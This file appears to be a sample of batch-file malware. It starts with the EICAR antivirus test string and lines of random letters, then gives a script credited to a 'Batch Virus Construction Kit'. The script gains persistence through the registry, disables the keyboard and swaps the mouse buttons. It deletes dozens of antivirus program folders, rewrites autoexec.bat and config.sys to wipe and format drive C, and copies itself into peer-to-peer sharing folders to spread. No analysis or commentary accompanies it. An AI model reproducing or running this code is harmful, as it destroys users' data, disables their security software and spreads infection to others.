X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
vndtcknothtnhuzxhracexwumfslimtcdutlnqkyndlnduldwhgyttroqbbnnnrzhsvytqkhrexlkskbmxvcqyqcwzoocqswty
ahtpqdpeuibvagqgjqsuxwostozbzhyjbnjwgzrwtgykmgrennxnrldbkpcdrsfsnpprmkjbmeztxnakywcmciavcricxtzubq
hikxaopdddmrcsipfxicptnvpfvwrikqideacctffviehyhvedmfgpictvqrseepriahymplfdqpavmowjugkfemudmpmbzpef
bganwuziomreqvfyitmjsbonngjuoqubkksycilrfhrthrcdifwupvyewevdnukdhikpabnmvqkieckfwfzimvxksvfwnaytvn
nehbcamahryecleffrbbinfuyvflhfenmnoicnjytqgxbejuzsyqdunolshzitmvrkmykjqydytifppnsdunemusdjiuaqyanq
rwytlpyjbmkaavuugtlwetjncuffrpkxweqzykmswjpuviplajthwfpaecwsvdtcqwiiixgtwbrcdnpwtkcyyqfofrwkpdzyra
zdrqphqoohdydvbxieqnqaxpdqccmfrqnpfcxcxxdpzcqcqxifblgcwxnqnpqsgsubcwqxhdiiuooncjbkkxlqvozraewfbjst
lkfolhbutwgudklyulrjjrkbsipntofakiyvajefzmdulahfkpicegscvpfjaifbecimslqxsapfpgqkjxupxivalmdomtogxh
thenidaybwhcgwwwmrfxpdtpuwvufuslpbzpefcwyoepdvbbvbtaysxkndrnbauahoxubjdfraxvepbyfpetvbblubszaehqfo
nbxyfppcduhmbdbadbcljhzlofzojtuwnlpeomenonisgcsdibsczkncxevldzlfnabjgmtctagoskrsisnjckuulzndvtnlft
::
:: Generated by Batch Virus Construction Kit 0.5 [DvL]-[rRLF]
:: Created by DvL
::
@echo off
@ver|find /i "XP"|if errorlevel 1 ctty nul|if not errorlevel 1 exit
break off
copy %0 %windir%\yqugpetr.bat>nul
echo.REGEDIT4>%windir%\yqugpetr.reg
echo.[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce]>>%windir%\yqugpetr.reg
echo."yqugpetr"="%windir%\yqugpetr.bat">>%windir%\yqugpetr.reg
regedit /s %windir%\yqugpetr.reg
rundll32 user,swapmousebutton
rundll32 keyboard,disable
set ger=deltree/y c:\
%ger%antiba~1\>nul
%ger%antiba~2\>nul
%ger%antiba~1.1\>nul
%ger%antiba~1.2\>nul
%ger%antiba~1.3\>nul
%ger%antiba~1.4\>nul
%ger%antiba~1.5\>nul
%ger%antiba~1.6\>nul
%ger%antiba~1.7\>nul
%ger%antiba~1.8\>nul
%ger%antivi~1\>nul
%ger%antivi~2\>nul
%ger%antiviru\>nul
%ger%avg\>nul
%ger%avp\>nul
%ger%avp30\>nul
%ger%avx\>nul
%ger%avpers~1\>nul
%ger%bitdef~1\>nul
%ger%bitdef~2\>nul
%ger%comman~1\>nul
%ger%cleancih\>nul
%ger%esafen\>nul
%ger%findvi~1\>nul
%ger%f-macro\>nul
%ger%f-prot\>nul
%ger%f-prot95\>nul
%ger%f-secu~1\>nul
%ger%fwin\>nul
%ger%fwin32\>nul
%ger%inocul~1\>nul
%ger%inocul~2\>nul
%ger%kasper~1\>nul
%ger%kasper~2\>nul
%ger%mcafee\>nul
%ger%mcafee~1\>nul
%ger%msav\>nul
%ger%norman\>nul
%ger%norton~1\>nul
%ger%norton~2\>nul
%ger%pav\>nul
%ger%pccill~1\>nul
%ger%pc-cil~1\>nul
%ger%rav\>nul
%ger%softwin\>nul
%ger%tbav\>nul
%ger%tbavw95\>nul
%ger%toolkit\>nul
%ger%trendm~1\>nul
%ger%trex\>nul
%ger%virus\>nul
%ger%vpc\>nul
%ger%vs95\>nul
%ger%zonela~1\>nul
%ger%zonela~2\>nul
set ger=deltree/y c:\progra~1\
%ger%antiba~1\>nul
%ger%antiba~2\>nul
%ger%antiba~1.1\>nul
%ger%antiba~1.2\>nul
%ger%antiba~1.3\>nul
%ger%antiba~1.4\>nul
%ger%antiba~1.5\>nul
%ger%antiba~1.6\>nul
%ger%antiba~1.7\>nul
%ger%antiba~1.8\>nul
%ger%antivi~1\>nul
%ger%antivi~2\>nul
%ger%avg\>nul
%ger%avp\>nul
%ger%avx\>nul
%ger%avx2000\>nul
%ger%avpers~1\>nul
%ger%bitdef~1\>nul
%ger%bitdef~2\>nul
%ger%comman~1\>nul
%ger%common~1\avpsha~1\>nul
%ger%common~1\symant~1\>nul
%ger%datafe~1\>nul
%ger%deerfi~1.com\>nul
%ger%f-prot\>nul
%ger%f-prot95\>nul
%ger%findvi~1\>nul
%ger%f-secu~1\>nul
%ger%f-secure\>nul
%ger%fsi\>nul
%ger%fwin\>nul
%ger%fwin32\>nul
%ger%grisoft\>nul
%ger%inocul~1\>nul
%ger%inocul~2\>nul
%ger%intern~2\>nul
%ger%kasper~1\>nul
%ger%kasper~2\>nul
%ger%mcafee\>nul
%ger%mcafee~1\>nul
%ger%mindso~1\>nul
%ger%norman\>nul
%ger%norton~1\>nul
%ger%norton~2\>nul
%ger%pandas~1\>nul
%ger%protec~1\>nul
%ger%protec~2\>nul
%ger%quickh~1\>nul
%ger%rav\>nul
%ger%signal9\>nul
%ger%softwin\>nul
%ger%spysto~1\>nul
%ger%symant~1\>nul
%ger%tbav\>nul
%ger%tinype~1\>nul
%ger%trendm~1\>nul
%ger%trendp~1\>nul
%ger%trojan~1\>nul
%ger%trojan~2\>nul
%ger%virusm~1.0\>nul
%ger%zonela~1\>nul
%ger%zonela~2\>nul
set ger=
echo.time 00:00:00,00>>c:\autoexec.bat
echo.date 80-01-01>>c:\autoexec.bat
echo.%comspec% nul /f /c if exist e:\nul subst e: a:\>>c:\autoexec.bat
echo.%comspec% nul /f /c if exist d:\nul subst d: a:\>>c:\autoexec.bat
echo.%comspec% nul /f /c if exist c:\nul subst c: a:\>>c:\autoexec.bat
echo.[menu]>c:\config.sys
echo.menuitem=u>>c:\config.sys
echo.>>c:\config.sys
echo.[u]>>c:\config.sys
echo.buffers=1>>c:\config.sys
echo.files=1>>c:\config.sys
echo.lastdrive=A>>c:\config.sys
echo.set path=deltree/y c:\>>c:\config.sys
echo.set temp=A:\>>c:\config.sys
echo.set windir=format c:/u/q/autotest>>c:\config.sys
copy %0 c:\kazaa\myshar~1\yqugpetr.bat>nul
copy %0 c:\mydown~1\yqugpetr.bat>nul
copy %0 c:\mydocu~1\yqugpetr.bat>nul
copy %0 c:\eigene~1\yqugpetr.bat>nul
copy %0 c:\progra~1\applej~1\incoming\yqugpetr.bat>nul
copy %0 c:\progra~1\bearsh~1\shared\yqugpetr.bat>nul
copy %0 c:\progra~1\edonke~1\incoming\yqugpetr.bat>nul
copy %0 c:\progra~1\emule\incoming\yqugpetr.bat>nul
copy %0 c:\progra~1\grokster\mygrok~1\yqugpetr.bat>nul
copy %0 c:\progra~1\icq\shared~1\yqugpetr.bat>nul
copy %0 c:\progra~1\kazaa\myshar~1\yqugpetr.bat>nul
copy %0 c:\progra~1\kazaal~1\myshar~1\yqugpetr.bat>nul
copy %0 c:\progra~1\kmd\myshar~1\yqugpetr.bat>nul
copy %0 c:\progra~1\limewire\shared\yqugpetr.bat>nul
copy %0 c:\progra~1\morpheus\myshar~1\yqugpetr.bat>nul
copy %0 c:\progra~1\overnet\bundles\yqugpetr.bat>nul
cls
